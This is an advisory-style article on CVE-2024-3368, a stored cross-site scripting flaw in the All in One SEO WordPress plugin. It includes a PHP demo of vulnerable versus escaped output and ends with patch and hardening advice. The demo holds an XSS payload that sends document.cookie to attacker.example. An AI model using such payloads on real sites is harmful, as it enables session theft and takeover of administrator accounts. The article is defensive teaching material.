A security vulnerability has been discovered in All in One SEO (AIOSEO), a widely used WordPress plugin with over 3 million active installations. This vulnerability, designated as CVE-2024-3368, enables attackers to inject malicious code into websites, potentially leading to unauthorized access, data theft, and website defacement.
The identified flaw is an authenticated stored cross-site scripting (XSS) vulnerability affecting all versions of AIOSEO up to and including 4.6.0. It arises from insufficient input sanitization and output escaping of the plugin's meta description field. As a result, an authenticated user with Contributor-level access or higher can store a script in the SEO section of a post, and that script runs in the browser of anyone who loads a page where the stored value is rendered. Because a Contributor cannot publish, the realistic victim is an Editor or Administrator who opens the post for review, which is exactly the session an attacker wants.
Stored XSS is particularly dangerous because the payload persists on the server and executes every time the affected content is viewed, with no need to lure each victim to a crafted link. In this instance the injection point is the meta description field rather than post bodies or comments. The injected JavaScript runs with the privileges of whoever views it; if that viewer is an administrator, it can use their session to create new admin accounts, exfiltrate data, or plant further malicious code.
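The mechanism described above, as an added illustration that is not AIOSEO's code: a stored description is written into a `<meta>` attribute without escaping, so a value that closes the attribute breaks out into a script tag. The hardened version sanitizes on save and escapes on output. The `sanitize_text_field()` and `esc_attr()` definitions below are stand-ins used only when WordPress is not loaded, so the script runs under the plain `php` CLI; the payload and the `attacker.example` URL are constructed for the example.

```php
<?php
// Added example (not AIOSEO's code): an unescaped meta description becomes
// stored XSS; sanitising on save plus escaping on output closes the hole.
// Runs under the php CLI with no WordPress install.

// Stand-ins for the WordPress helpers, defined only when WordPress is absent.
if (!function_exists('sanitize_text_field')) {
    function sanitize_text_field(string $s): string {
        // Approximation of the WordPress behaviour: strip tags and control chars.
        return trim(preg_replace('/[\x00-\x1F\x7F]/', '', strip_tags($s)));
    }
}
if (!function_exists('esc_attr')) {
    function esc_attr(string $s): string {
        return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    }
}

// Constructed payload of the kind a Contributor could type into the meta
// description field: closes the content attribute, then injects a script.
$payload = '"><script>fetch("https://attacker.example/?c="+document.cookie)</script><meta x="';

// VULNERABLE: the stored value is concatenated straight into the attribute.
function render_vulnerable(string $description): string {
    return '<meta name="description" content="' . $description . '">';
}

// HARDENED: sanitise what goes into the database, and escape for the
// attribute context when it is written back out. Both layers belong in
// place; either one alone already neutralises this particular payload.
function save_hardened(string $description): string {
    return sanitize_text_field($description);
}
function render_hardened(string $stored): string {
    return '<meta name="description" content="' . esc_attr($stored) . '">';
}

// A "<script" token surviving into the rendered HTML means the attribute
// context was broken out of.
function contains_script(string $html): bool {
    return stripos($html, '<script') !== false;
}

$vuln = render_vulnerable($payload);
$safe = render_hardened(save_hardened($payload));

echo "vulnerable: $vuln\n";
echo "hardened:   $safe\n";
echo "vulnerable reaches the browser as a script tag? " . (contains_script($vuln) ? 'yes' : 'no') . "\n";
echo "hardened reaches the browser as a script tag?   " . (contains_script($safe) ? 'yes' : 'no') . "\n";

// Output escaping alone also defuses the payload, because esc_attr() turns
// the closing quote into &quot; and the angle brackets into &lt; / &gt;.
echo "escape-only: " . render_hardened($payload) . "\n";
```

The check to carry into a real review is the second half: every place the plugin echoes the description into HTML must pass it through an escaping function matched to the context (`esc_attr()` inside attributes, `esc_html()` in element bodies), regardless of what sanitization happened on save.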
Security researcher Dmitrii Ignatyev from CleanTalk Inc has been credited with discovering this vulnerability.
A proof of concept (PoC) for exploiting CVE-2024-3368 has been shared, showing how an attacker with a Contributor account injects a payload into the SEO section of a new post. For example:
When such a payload is saved in the SEO section and the post is subsequently viewed, the script executes, which shows how little effort exploitation requires.
To protect against this vulnerability, WordPress site owners must update AIOSEO to version 4.6.1 or later, the release that patches it. Additionally, the following practices reduce exposure to XSS and similar threats:
- Conduct regular security audits, including a review of plugin update status, to identify and mitigate vulnerabilities
- Apply least privilege to user roles: grant Contributor access or higher only to accounts that need it, and remove stale accounts, since this flaw requires an authenticated user
- Deploy a web application firewall (WAF) to detect and block malicious requests, keeping in mind that it is a compensating control and does not replace the patch